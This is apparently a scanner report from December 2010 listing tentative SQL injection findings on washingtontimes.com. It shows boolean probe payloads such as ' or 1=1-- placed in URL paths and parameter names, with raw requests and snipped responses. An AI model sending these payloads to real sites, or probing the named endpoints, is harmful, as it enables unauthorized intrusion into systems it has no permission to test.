GET /opinion/commentary10016926'%20or%201%3d1--%20/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14479 Date: Mon, 13 Dec 2010 21:29:23 GMT X-Varnish: 570578473 Age: 0 Via: 1.1 varnish Connection: close
GET /opinion/commentary10016926'%20or%201%3d2--%20/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14654 Date: Mon, 13 Dec 2010 21:29:24 GMT X-Varnish: 570578713 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... <blockquote class="c400 right pullquote"><img src="http://media.washtimes.com/media/img/staff/2010/HILL_PATRICE_CUTOUT_s46x70.jpg?64979ce23d147b6fd352d13fee19baf12506ed31" width="46" height="70" alt="Patrice Hill" class="left right mt ml" /><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/us-free-traders-sour-on-china/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Trade tensions between the United States and China have broken out into open verbal warfare.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/patrice-hill/">Patrice Hill</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li class="active blue" id="menu_opinion"><a href="/opinion/" class="active" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li id="menu_culture"><a href="/culture/" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li id="menu_multimedia"><a href="/multimedia/" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="t ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /opinion'%20and%201%3d1--%20/decker/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14721 Date: Mon, 13 Dec 2010 21:29:28 GMT X-Varnish: 570578594 Age: 0 Via: 1.1 varnish Connection: close
GET /opinion'%20and%201%3d2--%20/decker/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14580 Date: Mon, 13 Dec 2010 21:29:29 GMT X-Varnish: 570578837 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... <blockquote class="c400 right pullquote"><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/amtrak-exec-vincent-gray-controversial-firing/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">An Amtrak executive heading Gray's transition team is connected with the controversial dismissal of a former Amtrak inspector general.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/jim-mcelhatton/">Jim McElhatton</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li class="active blue" id="menu_opinion"><a href="/opinion/" class="active" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li id="menu_culture"><a href="/culture/" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li id="menu_multimedia"><a href="/multimedia/" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script></div></li></ul><ul class="full nav se ...[SNIP]...
1.19. http://www.washingtontimes.com/opinion/decker/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.washingtontimes.com
Path:
/opinion/decker/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /opinion/decker/?1'%20and%201%3d1--%20=1 HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 30547 Date: Mon, 13 Dec 2010 21:27:55 GMT X-Varnish: 570576816 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>decker - W ...[SNIP]... <blockquote class="c400 right pullquote"><img src="http://media.washtimes.com/media/img/staff/2010/LENGELL_SEAN_CUTOUT_s48x70.jpg?248150494911055c9c22ceea125bb17612a1ba43" width="48" height="70" alt="Sean Lengell" class="left right mt ml" /><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/house-financial-panel-to-see-a-new-style/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Spencer Bachus said one of his key priorities is to revamp, if not undo, much of Obama's financial reforms.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/sean-lengell/">Sean Lengell</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li class="active blue" id="menu_opinion"><a href="/opinion/" class="active" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li id="menu_culture"><a href="/culture/" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li id="menu_multimedia"><a href="/multimedia/" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml" ...[SNIP]...
Request 2
GET /opinion/decker/?1'%20and%201%3d2--%20=1 HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 30342 Date: Mon, 13 Dec 2010 21:28:09 GMT X-Varnish: 570576933 Age: 0 Via: 1.1 varnish Connection: close
1.20. http://www.washingtontimes.com/opinion/editorials/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.washingtontimes.com
Path:
/opinion/editorials/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 21423528'%20or%201%3d1--%20 and 21423528'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /opinion/editorials/?121423528'%20or%201%3d1--%20=1 HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 39985 Date: Mon, 13 Dec 2010 21:26:48 GMT X-Varnish: 570575306 Age: 0 Via: 1.1 varnish Connection: close
GET /opinion/editorials/?121423528'%20or%201%3d2--%20=1 HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 39968 Date: Mon, 13 Dec 2010 21:26:58 GMT X-Varnish: 570575553 Age: 0 Via: 1.1 varnish Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /opinion'%20and%201%3d1--%20/letters/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14714 Date: Mon, 13 Dec 2010 21:29:14 GMT X-Varnish: 570578281 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... <img src="http://media.washtimes.com/media/img/staff/2010/HILL_PATRICE_CUTOUT_s46x70.jpg?64979ce23d147b6fd352d13fee19baf12506ed31" width="46" height="70" alt="Patrice Hill" class="left right mt ml" /><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/us-free-traders-sour-on-china/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Trade tensions between the United States and China have broken out into open verbal warfare.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/patrice-hill/">Patrice Hill</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li class="active blue" id="menu_opinion"><a href="/opinion/" class="active" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li id="menu_culture"><a href="/culture/" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li id="menu_multimedia"><a href="/multimedia/" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="text/javascript" src="http://www.google.com/coop/cse/brand? ...[SNIP]...
Request 2
GET /opinion'%20and%201%3d2--%20/letters/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14738 Date: Mon, 13 Dec 2010 21:29:25 GMT X-Varnish: 570578510 Age: 0 Via: 1.1 varnish Connection: close
1.22. http://www.washingtontimes.com/sports/baseball/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.washingtontimes.com
Path:
/sports/baseball/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 16877614%20or%201%3d1--%20 and 16877614%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /sports/baseball/?116877614%20or%201%3d1--%20=1 HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 41133 Date: Mon, 13 Dec 2010 21:30:20 GMT X-Varnish: 570579927 Age: 0 Via: 1.1 varnish Connection: close
GET /sports/baseball/?116877614%20or%201%3d2--%20=1 HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 41116 Date: Mon, 13 Dec 2010 21:30:21 GMT X-Varnish: 570579953 Age: 0 Via: 1.1 varnish Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /sports'%20and%201%3d1--%20/golf/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14534 Date: Mon, 13 Dec 2010 21:33:30 GMT X-Varnish: 570584003 Age: 0 Via: 1.1 varnish Connection: close
GET /sports'%20and%201%3d2--%20/golf/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14716 Date: Mon, 13 Dec 2010 21:33:31 GMT X-Varnish: 570584014 Age: 0 Via: 1.1 varnish Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /sports'%20and%201%3d1--%20/hockey/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14716 Date: Mon, 13 Dec 2010 21:32:27 GMT X-Varnish: 570582610 Age: 0 Via: 1.1 varnish Connection: close
GET /sports'%20and%201%3d2--%20/hockey/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14739 Date: Mon, 13 Dec 2010 21:32:28 GMT X-Varnish: 570582616 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... <img src="http://media.washtimes.com/media/img/staff/2010/LENGELL_SEAN_CUTOUT_s48x70.jpg?248150494911055c9c22ceea125bb17612a1ba43" width="48" height="70" alt="Sean Lengell" class="left right mt ml" /><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/house-financial-panel-to-see-a-new-style/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Spencer Bachus said one of his key priorities is to revamp, if not undo, much of Obama's financial reforms.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/sean-lengell/">Sean Lengell</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li class="active blue" id="menu_sports"><a href="/sports/" class="active" title="Sports">Sports</a></li><li id="menu_culture"><a href="/culture/" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li id="menu_multimedia"><a href="/multimedia/" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="text/javascript" src="http:// ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 79157052'%20or%201%3d1--%20 and 79157052'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /sports/soccer79157052'%20or%201%3d1--%20/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14192 Date: Mon, 13 Dec 2010 21:34:01 GMT X-Varnish: 570584819 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... <blockquote class="c400 right pullquote"><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/amtrak-exec-vincent-gray-controversial-firing/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">An Amtrak executive heading Gray's transition team is connected with the controversial dismissal of a former Amtrak inspector general.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/jim-mcelhatton/">Jim McElhatton</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li class="active blue" id="menu_sports"><a href="/sports/" class="active" title="Sports">Sports</a></li><li id="menu_culture"><a href="/culture/" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li id="menu_multimedia"><a href="/multimedia/" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script></div></li></ul><ul class="full nav se ...[SNIP]...
Request 2
GET /sports/soccer79157052'%20or%201%3d2--%20/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14326 Date: Mon, 13 Dec 2010 21:34:13 GMT X-Varnish: 570584830 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... <blockquote class="c400 right pullquote"><img src="http://media.washtimes.com/media/img/staff/2010/HILL_PATRICE_CUTOUT_s46x70.jpg?64979ce23d147b6fd352d13fee19baf12506ed31" width="46" height="70" alt="Patrice Hill" class="left right mt ml" /><h3 class="sans italics grey mb min ra"><img src="http://media.washtimes.com/static/images/quote-open.gif" height="13" width="17" alt="quote" class="mb mr min"/><a href="/news/2010/dec/12/us-free-traders-sour-on-china/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Trade tensions between the United States and China have broken out into open verbal warfare.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/patrice-hill/">Patrice Hill</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li class="active blue" id="menu_sports"><a href="/sports/" class="active" title="Sports">Sports</a></li><li id="menu_culture"><a href="/culture/" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li id="menu_multimedia"><a href="/multimedia/" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="t ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 21465276'%20or%201%3d1--%20 and 21465276'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /staff21465276'%20or%201%3d1--%20/rowan-scarborough/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14722 Date: Mon, 13 Dec 2010 21:28:33 GMT X-Varnish: 570577724 Age: 0 Via: 1.1 varnish Connection: close
GET /staff21465276'%20or%201%3d2--%20/rowan-scarborough/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14739 Date: Mon, 13 Dec 2010 21:28:33 GMT X-Varnish: 570577730 Age: 0 Via: 1.1 varnish Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 11145785'%20or%201%3d1--%20 and 11145785'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /video/white-house-minute11145785'%20or%201%3d1--%20/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14486 Date: Mon, 13 Dec 2010 21:38:41 GMT X-Varnish: 570591887 Age: 0 Via: 1.1 varnish Connection: close
